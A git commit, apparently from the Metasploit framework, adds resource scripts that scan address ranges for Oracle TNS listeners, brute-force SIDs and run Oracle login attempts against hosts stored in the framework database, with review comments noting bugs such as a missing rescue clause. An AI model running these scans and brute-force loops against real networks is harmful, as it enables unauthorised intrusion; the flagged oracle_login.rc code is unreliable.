
Adding oracle RC scripts from nebulus

Also adds at least title/attribution to the scripts. Should probably get
a proper format for that if we get more of these bad boys.

[Fixes #6145]
1 parent 03a39f7 commit 51a7f05d8574d6338eee516d4823951fd943dd18 @todb todb committed Jan 9, 2012
@@ -0,0 +1,66 @@
+# oracle_login.rc
+# Author: nebulus
+
+<ruby>
+
+hosts = {}
+host_id_to_ip = {}
+
+# map hosts ip to host_id
+
+begin
+ framework.db.hosts.each do |host|
+ # don't really like having to do that but only way I could tie them together as notes were missing ip
+ host_id_to_ip[host.id] = host.address
+ end
+ rescue ActiveRecord::ConnectionNotEstablished
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+
+end
+
+begin
+ framework.db.notes.each do |note|
+ if ( note.ntype == 'oracle_sid' )
+ data = note.data
+ if(data =~ /PORT=(\d+), SID=(\S*)$/)
+ ip = host_id_to_ip[note.host_id]
+ port = "#{$1}"
+ sid = "#{$2}"
+ if(sid != '')
+ hosts["#{ip}"] = {'RPORT' => port, 'SID' => sid}
+ end
+ else
+ puts "Bad regexp (#{note.inspect})"
+ end
+ end
+ end
+ rescue ActiveRecord::ConnectionNotEstablished
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+end
+
+self.run_single("use auxiliary/admin/oracle/oracle_login")
+
+hosts.each do |rhost|
+ begin
+ self.run_single("set RHOST #{rhost[0]}")
+ self.run_single("set RPORT #{rhost[1]['RPORT']}")
+ self.run_single("set SID #{rhost[1]['SID']}")
+ self.run_single('exploit')
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+ end
+
+end
+</ruby>
+
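Review bot: In the final `hosts.each` loop the `begin` block has no `rescue` clause, so `puts "DB not connected..."` runs after every `exploit` call and a dropped connection is never actually handled; the line `rescue ActiveRecord::ConnectionNotEstablished` used in the two blocks above appears to have been lost in the copy. Restore it directly before that `puts`. Separately, `hosts` is keyed by IP, so a host with several `oracle_sid` notes keeps only the last SID, and a note whose `host_id` is absent from `host_id_to_ip` yields an empty key and an empty `set RHOST`; a guard such as `next if ip.nil?` after the lookup would avoid that. The SID captured by `(\S*)` comes from stored note data (presumably scan output) and is interpolated into a console command, so a narrower match anchored with `\z` rather than `$`, for example `([\w.]+)\z`, would be safer.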
@@ -0,0 +1,34 @@
+# oracle_sids.rc
+# Author: nebulus
+
+<ruby>
+
+hosts = []
+
+begin
+ framework.db.services.each do |service|
+ if ( (service.port == 1521 or service.port == 1522 or service.port == 1526) and (service.name =~ /oracle/i) and service.state == 'open')
+ hosts << {'ip' => service.host.address, 'port' => service.port}
+ end
+ end
+ rescue ActiveRecord::ConnectionNotEstablished
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+end
+
+
+self.run_single("use auxiliary/admin/oracle/sid_brute")
+
+hosts.each do |rhost|
+
+ self.run_single("set RHOST #{rhost['ip']}")
+ self.run_single("set RPORT #{rhost['port']}")
+ self.run_single('set ConnectTimeout 5')
+ self.run_single('run')
+ sleep 1
+end
+</ruby>
+
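Review bot: The header of oracle_sids.rc gives only a title and author, and nothing states what the script needs or how widely it acts: it reads `framework.db.services` and runs `sid_brute` against every open service on 1521/1522/1526 whose name matches `/oracle/i`, with no way to narrow the target set. Add a header comment along the lines of `# Requires a connected database with services already populated; runs sid_brute against every matching Oracle listener recorded there.` When the `rescue` fires the script only prints a message and then continues with an empty `hosts`, which is worth stating in the same comment. As a style point, the port test reads more clearly as `[1521, 1522, 1526].include?(service.port)`.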
@@ -0,0 +1,28 @@
+# oracle_tns.rc
+# Author: nebulus
+
+<ruby>
+
+hosts = [
+'10.1.1.0/24',
+'10.1.2.1',
+'192.168.0.0/16'
+]
+
+ports = ['1521', '1522', '1526']
+
+self.run_single("use auxiliary/scanner/oracle/tnslsnr_version")
+
+hosts.each do |net|
+ ports.each do |port|
+ self.run_single("set RHOSTS #{net}")
+ self.run_single("set THREADS 128")
+ self.run_single("set RPORT #{port}")
+ self.run_single('set ConnectTimeout 5')
+ self.run_single('set VERBOSE false')
+ self.run_single('run')
+ sleep 1
+ end
+end
+</ruby>
+
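Review bot: The `hosts` array ships with hard-coded ranges (`10.1.1.0/24`, `10.1.2.1`, `192.168.0.0/16`) and nothing in the file marks them as placeholders, so running the script unedited scans those networks, including a /16, at `THREADS 128`. Add a comment above the array such as `# EDIT BEFORE USE: replace with the address ranges in scope for this assessment`. The `set THREADS`, `set ConnectTimeout` and `set VERBOSE` calls do not depend on `net` or `port` and could be issued once before the loops.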
@@ -1,3 +1,6 @@
+# run_all_post.rc
+# Author: mubix
+
# This is a sample resource script demonstrating a technique of running
# a single post module against several active sessions at once. The post
# module should be the currently active module, with sessions from other
